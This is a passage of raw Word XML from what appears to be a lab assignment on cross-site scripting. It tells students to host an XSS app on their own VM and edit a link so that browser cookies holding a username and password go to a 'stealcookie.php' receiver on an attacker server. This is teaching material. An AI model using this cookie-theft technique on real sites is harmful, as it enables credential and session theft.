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450FA" w14:textId="77777777" w:rsidR="008C154F" w:rsidRDefault="008C154F" w:rsidP="002228D9">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41E38E71" w14:textId="77777777" w:rsidR="00856089" w:rsidRDefault="00967072" w:rsidP="002228D9">
      <w:pPr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51DC5633" w14:textId="77777777" w:rsidR="002228D9" w:rsidRDefault="00F236CF" w:rsidP="00F236CF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F236CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Cross Site Scripting (XSS) attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE3B181" w14:textId="77777777" w:rsidR="002F1243" w:rsidRDefault="002F1243" w:rsidP="002F1243">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="161D6693" w14:textId="77777777" w:rsidR="00DC188F" w:rsidRDefault="007E3E37" w:rsidP="00DC188F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E3E37">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Host the XSS Web application on your </w:t>
      </w:r>
      <w:r w:rsidR="00597A9D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="007E3E37">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>pache Web server by</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F4DE89" w14:textId="77777777" w:rsidR="007A4CDC" w:rsidRDefault="007A4CDC" w:rsidP="00D245A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC188F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Copy “</w:t>
      </w:r>
      <w:r w:rsidR="00D245A8" w:rsidRPr="00D245A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>XSS.tar.gz</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC188F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>” to your VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D09EC09" w14:textId="77777777" w:rsidR="004016A4" w:rsidRDefault="00E06E33" w:rsidP="001F3D2F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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</w:t>
      </w:r>
      <w:r w:rsidR="001F3D2F" w:rsidRPr="001F3D2F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>xtract the .tar.gz file to the appropriate directory of the Apache 2 Web server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B0ECF1" w14:textId="77777777" w:rsidR="007A4CDC" w:rsidRDefault="006963EE" w:rsidP="00FD230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D7963">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00C0093B" w:rsidRPr="004D7963">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>roperly set the permissions of the extracted directory and files so that webpages in the</w:t>
      </w:r>
      <w:r w:rsidR="00FF1A09" w:rsidRPr="004D7963">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C0093B" w:rsidRPr="004D7963">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS directory can be properly accessed by anyone through a Web browser, </w:t>
      </w:r>
      <w:r w:rsidR="00C11CBD" w:rsidRPr="00A31806">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">e.g., by typing: </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="0098161F" w:rsidRPr="00C42527">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>http://192.168.65.128/XSS/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C11CBD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> in which that IP address is for my VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7E860E" w14:textId="77777777" w:rsidR="004D76CE" w:rsidRPr="004D76CE" w:rsidRDefault="004D76CE" w:rsidP="004D76CE">
      <w:pPr>
        <w:ind w:left="792"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06E9C33F" w14:textId="77777777" w:rsidR="00762CB9" w:rsidRDefault="006068F3" w:rsidP="00E34DE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006068F3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Visit the XSS Web application using a browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F3FA9D" w14:textId="77777777" w:rsidR="000052BE" w:rsidRDefault="00181E67" w:rsidP="007B6795">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0F09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>You will see two links as shown below. click the “First, visit this page!” link to visit</w:t>
      </w:r>
      <w:r w:rsidR="006F0F09" w:rsidRPr="006F0F09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F0F09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>setgetcookie.htm</w:t>
      </w:r>
      <w:r w:rsidR="00541DC5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE231C0" w14:textId="77777777" w:rsidR="00010F1C" w:rsidRDefault="00AF642F" w:rsidP="00010F1C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1152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3564A684" wp14:editId="7154DBEF">
            <wp:extent cx="1495425" cy="10858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9B6EFD" w14:textId="77777777" w:rsidR="00B97DC8" w:rsidRDefault="006039E7" w:rsidP="008A33E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B26349">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>On setgetcookie.html, fill the username/password form, click “Set cookie” and then</w:t>
      </w:r>
      <w:r w:rsidR="00B26349" w:rsidRPr="00B26349">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B26349">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>“Show cookie” buttons to make sure this website set a cookie to your browser</w:t>
      </w:r>
      <w:r w:rsidR="00541DC5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFDAA63" w14:textId="77777777" w:rsidR="00541DC5" w:rsidRDefault="00315852" w:rsidP="00D14BCF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F0D85">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r w:rsidR="00757927" w:rsidRPr="005F0D85">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>o back and click the “Then, visit this page!” link to visit malURL.htm</w:t>
      </w:r>
      <w:r w:rsidR="00B61CAE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="005F0D85" w:rsidRPr="005F0D85">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00757927" w:rsidRPr="005F0D85">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>You will see two links on this malURL.htm page as shown below, but both of them do</w:t>
      </w:r>
      <w:r w:rsidR="005F0D85" w:rsidRPr="005F0D85">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00757927" w:rsidRPr="005F0D85">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>not work right now.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717E86EE" w14:textId="77777777" w:rsidR="003B3BD1" w:rsidRDefault="006D469E" w:rsidP="003B3BD1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1152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5F8652B0" wp14:editId="3F1F154F">
            <wp:extent cx="4810125" cy="1952625"/>
            <wp:effectExtent l="0" t="0" r="9525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0B591D" w14:textId="77777777" w:rsidR="00090E47" w:rsidRDefault="00703430" w:rsidP="00C72239">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00623E41">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="002F402E" w:rsidRPr="00623E41">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">hange the malURL.htm of your XSS Web application, so that when you click the </w:t>
      </w:r>
      <w:r w:rsidR="001F5647">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>FIRST</w:t>
      </w:r>
      <w:r w:rsidR="00623E41" w:rsidRPr="00623E41">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002F402E" w:rsidRPr="00623E41">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>“EMC's RSA Security Breach May Cost Bank Customers $100 Million” link, the</w:t>
      </w:r>
      <w:r w:rsidR="00623E41" w:rsidRPr="00623E41">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002F402E" w:rsidRPr="00623E41">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>cookie stored on your browser for this website will be sent to an attacker’s server (that’s</w:t>
      </w:r>
      <w:r w:rsidR="00623E41" w:rsidRPr="00623E41">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002F402E" w:rsidRPr="00623E41">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">my </w:t>
      </w:r>
      <w:r w:rsidR="00612A69">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>VM</w:t>
      </w:r>
      <w:r w:rsidR="002F402E" w:rsidRPr="00623E41">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>) using an HTTP GET request with the following format:</w:t>
      </w:r>
      <w:r w:rsidR="00623E41" w:rsidRPr="00623E41">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346682BB" w14:textId="77777777" w:rsidR="00D62BFC" w:rsidRDefault="00270697" w:rsidP="00090E47">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1152"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00D42655" w:rsidRPr="00C42527">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>http://192.168.65.128/XSS/stealcookie.php?info=COOKIES</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C21B24">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB20790" w14:textId="77777777" w:rsidR="00E5128D" w:rsidRDefault="00E5128D" w:rsidP="00090E47">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1152"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57D91207" w14:textId="77777777" w:rsidR="00E5128D" w:rsidRDefault="009709B4" w:rsidP="009709B4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1152"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009709B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: you </w:t>
      </w:r>
      <w:r w:rsidR="00745B0D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>need</w:t>
      </w:r>
      <w:r w:rsidR="00C546B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> to</w:t>
      </w:r>
      <w:r w:rsidRPr="009709B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> use the above </w:t>
      </w:r>
      <w:r w:rsidR="00BE4727">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>address</w:t>
      </w:r>
      <w:r w:rsidRPr="009709B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> and format</w:t>
      </w:r>
      <w:r w:rsidR="00CF5057">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> with your own IP address but not mine</w:t>
      </w:r>
      <w:r w:rsidRPr="009709B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, so that the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009709B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>stealcookie.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009709B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:r w:rsidR="00E5586F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>your</w:t>
      </w:r>
      <w:r w:rsidR="0051573C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00374A86">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>VM</w:t>
      </w:r>
      <w:r w:rsidRPr="009709B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> can receive and verify </w:t>
      </w:r>
      <w:r w:rsidR="00B82F0F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidRPr="009709B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> submission record. Here, COOKIES means</w:t>
      </w:r>
      <w:r w:rsidR="00B3685C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009709B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>the complete cookie content save on your browser for this website (i.e.,</w:t>
      </w:r>
      <w:r w:rsidR="00D7104B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009709B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009709B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>), so it should include a pair of username and password values. The</w:t>
      </w:r>
      <w:r w:rsidR="00F95C08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009709B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">file </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009709B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>stealcookie.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000D2751">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> is also included in XSS.tar.gz</w:t>
      </w:r>
      <w:r w:rsidRPr="009709B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9573E7" w14:textId="77777777" w:rsidR="008B2368" w:rsidRDefault="008B2368" w:rsidP="009709B4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1152"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="298C4B32" w14:textId="77777777" w:rsidR="000634F8" w:rsidRDefault="000634F8" w:rsidP="000634F8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1152"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000634F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Hint: there could be multiple solutions. One solution is to simply replace the current</w:t>
      </w:r>
      <w:r w:rsidR="00C11A76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000634F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000634F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> value ("#") of the first link in malURL.htm with a piece of JavaScript code;</w:t>
      </w:r>
      <w:r w:rsidR="00DB4123">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000634F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>nothing else needs to be changed. Note that if you use this solution and if you move</w:t>
      </w:r>
      <w:r w:rsidR="00DB4123">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000634F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">the mouse over the link, you may notice that my </w:t>
      </w:r>
      <w:r w:rsidR="00B64C07">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>VM</w:t>
      </w:r>
      <w:r w:rsidRPr="000634F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> address information is shown on the status bar of your browser. So, a security conscious user may</w:t>
      </w:r>
      <w:r w:rsidR="00DB4123">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000634F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>notice this and may not be tricked to click the link.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A2A7E6" w14:textId="77777777" w:rsidR="0006376F" w:rsidRDefault="0006376F" w:rsidP="008C0773">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3872"/>
        </w:tabs>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="062D94AF" w14:textId="5F1F08D4" w:rsidR="000E23BC" w:rsidRDefault="000E23BC" w:rsidP="008C0773">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3872"/>
